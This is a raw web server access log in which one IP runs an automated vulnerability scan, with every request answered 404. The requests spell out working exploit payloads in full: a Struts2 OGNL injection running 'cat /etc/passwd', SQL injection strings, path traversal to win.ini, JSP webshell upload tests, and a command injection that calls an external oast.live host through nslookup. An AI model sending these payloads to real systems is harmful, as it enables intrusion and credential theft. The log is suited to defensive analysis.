137.220.197.141 - - [21/Jan/2024:02:09:57 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:09:59 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:10:50 +0100] "GET /services/getFile.cmd?userfile=config.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:11:44 +0100] "GET /services/getFile.cmd?userfile=config.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:11:51 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:11:53 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:12:08 +0100] "GET /services/getFile.cmd?userfile=config.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:12:40 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:12:42 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:15:25 +0100] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 952
93.183.131.171 - - [21/Jan/2024:02:15:48 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:16:19 +0100] "GET /services/getFile.cmd?userfile=config.xml HTTP/1.1" 404 952
146.19.24.23 - - [21/Jan/2024:02:16:59 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:17:03 +0100] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:17:15 +0100] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:17:28 +0100] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:18:27 +0100] "GET /services/getFile.cmd?userfile=config.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:18:39 +0100] "GET /services/getFile.cmd?userfile=config.xml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:19:34 +0100] "GET /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:19:36 +0100] "GET /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:19:49 +0100] "POST /RPC2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:21:09 +0100] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:21:11 +0100] "POST /RPC2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:21:22 +0100] "POST /RPC2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:21:28 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:21:30 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:21:34 +0100] "POST /RPC2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:22:03 +0100] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:22:23 +0100] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:22:27 +0100] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:22:52 +0100] "GET /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:22:54 +0100] "GET /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:23:14 +0100] "GET /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:23:16 +0100] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:23:16 +0100] "GET /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:23:18 +0100] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:23:20 +0100] "POST /invoker/readonly HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:23:41 +0100] "GET /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:23:43 +0100] "GET /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:24:03 +0100] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:24:15 +0100] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:24:28 +0100] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:24:36 +0100] "POST /RPC2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:25:21 +0100] "POST /RPC2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:25:43 +0100] "POST /RPC2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:26:02 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:26:04 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:26:30 +0100] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:26:30 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:26:32 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:26:47 +0100] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:27:16 +0100] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:27:18 +0100] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:27:20 +0100] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:27:22 +0100] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:27:24 +0100] "GET /forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:27:26 +0100] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:27:35 +0100] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:27:37 +0100] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:27:39 +0100] "POST /invoker/readonly HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:01 +0100] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:06 +0100] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:08 +0100] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:10 +0100] "POST /invoker/readonly HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:14 +0100] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:24 +0100] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:37 +0100] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:41 +0100] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:43 +0100] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:45 +0100] "POST /invoker/readonly HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:52 +0100] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:28:58 +0100] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:29:10 +0100] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:29:16 +0100] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:29:17 +0100] "POST /RPC2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:29:35 +0100] "PUT /poc.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:29:37 +0100] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:30:52 +0100] "PUT /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:30:54 +0100] "GET /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:30:57 +0100] "GET /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:30:59 +0100] "GET /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:31:09 +0100] "POST /RPC2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:31:21 +0100] "POST /RPC2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:31:47 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:32:28 +0100] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:32:31 +0100] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:32:46 +0100] "GET /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:32:48 +0100] "GET /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:32:54 +0100] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:32:56 +0100] "PUT /poc.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:32:58 +0100] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:33:18 +0100] "PUT /poc.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:33:20 +0100] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:33:31 +0100] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:33:34 +0100] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:33:36 +0100] "GET /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:33:38 +0100] "GET /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:33:45 +0100] "PUT /poc.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:33:47 +0100] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:33:48 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:33:54 +0100] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:33:58 +0100] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:03 +0100] "PUT /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:03 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:05 +0100] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:05 +0100] "GET /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:17 +0100] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:19 +0100] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:19 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:25 +0100] "PUT /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:27 +0100] "GET /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:30 +0100] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:41 +0100] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:51 +0100] "PUT /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:34:53 +0100] "GET /2bECz0mEnw1ObRN1BQoJ6Hqraf8.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:35:49 +0100] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:36:02 +0100] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:37:28 +0100] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:37:47 +0100] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:06 +0100] "GET /webadmin/script?command=|%20nslookup%20cmm00rc3m87t5g88qsoghoha355iuz1e6.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:18 +0100] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:31 +0100] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:33 +0100] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:34 +0100] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:34 +0100] "POST /invoker/readonly HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:38 +0100] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:38 +0100] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:40 +0100] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:02:38:40 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
